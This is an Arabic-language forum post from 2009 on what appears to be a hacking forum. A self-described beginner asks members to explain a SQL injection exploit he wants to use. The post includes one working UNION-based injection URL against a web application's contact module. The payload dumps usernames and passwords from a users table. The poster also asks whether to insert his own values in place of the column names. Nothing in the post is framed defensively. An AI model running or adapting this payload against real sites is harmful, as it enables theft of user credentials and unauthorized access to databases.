السلام عليكم ورحمة الله وبركاتة
اخواني اعضاء منتدى العاصفه لكم كل التحية والاحترام
اتمنى احد فيكم يتكرم ويشرح لي هذا الاستغلال واكون له شاكر
وطبعا غيري راح يستفيد من هالموضوع والمقصود بهم المبتدئين
كود:
index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*
سؤالي هل اقوم بالتعديل على هالاستغلال
لانكم لو تلاحظون الاستغلال مكتوب فيه
password << هل احط باسورد من عندي
nickname << هل اضيف نك نيم من عندي ايضا
اتمنى شرح هالاستغلال تكفون ياوحووووش
واللي يدخل ويقدر ساعدني لايتجاهل موضوعي
وصدقوني ماراح انساكم من الدعاء
كل الود والتقدير
موضوع: شرح استغلال ثغرة SQL Injection 
الجمعة مايو 08, 2009 10:39 am
